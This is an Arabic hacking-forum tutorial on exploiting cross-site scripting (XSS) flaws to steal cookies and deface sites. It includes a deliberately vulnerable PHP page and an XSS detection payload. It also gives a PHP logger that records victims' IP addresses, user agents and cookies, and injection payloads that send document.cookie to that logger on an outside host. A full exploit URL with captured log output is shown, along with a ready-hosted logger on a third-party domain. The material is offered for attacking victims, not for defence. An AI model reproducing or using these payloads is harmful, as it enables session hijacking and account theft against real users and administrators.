بسم الله الرحمآن الرحيم
ان شاء الله اليوم رح نشرح
\ اكتشاف تغرات xss \ تعليق الآندكس من تغرات xss \ سرقة كوكيز من تغرات xss
################
سرقة الكوكيز من تغرات xss
اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا
download
تانيا لازم يكون عندنا الموقع المصاب او السكربت
انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره
نسميه مثلا ..~
xss.php 
ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~
كود PHP:
<?
echo $_GET***91;'test'***93; ;
echo '<b>@nor15din</b>'
?>
طيب الآن نستعرض الملف المصاب مع المتغير !
~~~~~~~~~~~~
على فكره شباب !
تم شرح التغره من قبل في المنتدى ..~
يستحسن انكم تراجعوا هذا الرابط ..~
http://www.vbspiders.com/vb/t24758.html
&
http://www.vbspiders.com/vb/t22376.html
~~~~~~~~~~~~
طيب نتابع
طبعا كيف نكتشف التغره سهل كثير ..~
يعني تضيف الكود هذا
كود PHP:
'"--></style></script>***************("Www.VbspiderS.Com")</script>
بعد المتغير ..~
رح ارفق لكم الكود في المرفقات مع كل حاجه !
طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~
تعال الآن نستفيد من التغره !
اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~
تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~
شو هاي الحلاوه ..~
ههه
انا رح اشرح لكم كيف تسرق الكوكيز ..~
اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt
ملفات اللوج تكون خاصه :(
وهناك ملفات لووج تجيب لك معلومات كامله !
كوكيز + الوقت + التاريخ + ...
وفي نوع آخر عادي ..~
يعطيك الكوكيز فقط !
ههع
رح اعطيكم ملف لووج عندي كثير حلو
طيب نشوف السورس كود بتاعوا ..~
كود PHP:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER***91;'REMOTE_ADDR'***93;) && $_SERVER***91;'REMOTE_ADDR'***93; && strcasecmp($_SERVER***91;'REMOTE_ADDR'***93;, "unknown"))
$ip = $_SERVER***91;'REMOTE_ADDR'***93;;
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="nor15din.txt";
$****** = $_SERVER***91;'QUERY_STRING'***93;;
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER***91;'REMOTE_PORT'***93;;
$user_agent = $_SERVER***91;'HTTP_USER_AGENT'***93;;
$rqst_method = $_SERVER***91;'METHOD'***93;;
$rem_host = $_SERVER***91;'REMOTE_HOST'***93;;
$referer = $_SERVER***91;'HTTP_REFERER'***93;;
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | ******: $****** <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | ******: $****** \n\n");
fclose($log);
}
logData();
echo '<b>powered by vbspiders team</b>'
?>
لازم نرفعوا على شل :(
انا عندي مرفوع على شل ..~
الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا !
www.vbspiders.com/log.php
ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt
www.vbspiders.com/nor15din.txt 
طيب الآن كيف نستغل التغره ..~
يلزمنى كود تلغيم ..~
كود PHP:
"><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>
or
كود PHP:
"><script language= "JavaScript">********.location="http://vbspiders.com/log.php?******=" + ********.******;********.location="http://www.google.com"</script>
حلو !
رح نضيف هذول الاكواد مع تغير مايجب تغيره
 | اقتباس |  | | | | | | | | | |
http://localhost/xss.php?test="><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script> | |  | |  | |
نضط اوونتر ونروح نفتح الملف nor15din.txt
| | اقتباس | | | | | | | | | | |
IP: | PORT: 56840 | HOST: | Agent: | METHOD: | REF: | DATE: | ******: ******= | | | | | | |
ههههه حلو ..~
ياريت اي واحد ينقل الموضوع ..~
يحافض على الحقوق :(
لتحميل الادواة
~~~~~~~~~~~~~~~~~~
الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML
لتحميل الشرح الكامل على شكل صفحه HTML
لتحميل فيديوا التطبيق
وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز
http://www.illicitromance.com/log.php
وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات
http://www.illicitromance.com/nor15din.txt
ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات
xss
priv8 ~ تعليق الاندكس من ثغرات priv8 ~ xss
~~~~~~~~~~~~
وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا
IronMan
جديد استخدامات xss وهي الـ phishing login
بالتوفيق ..
@nor15din
F jl hgj[]d] D Z avp ;hlg lj;hlg gjyvhj xss | hpjvhtd >>Z la;gi l,q,u l,ru g;k hg]dk hgw,v hpjvht hsjtshv []d] vtu avp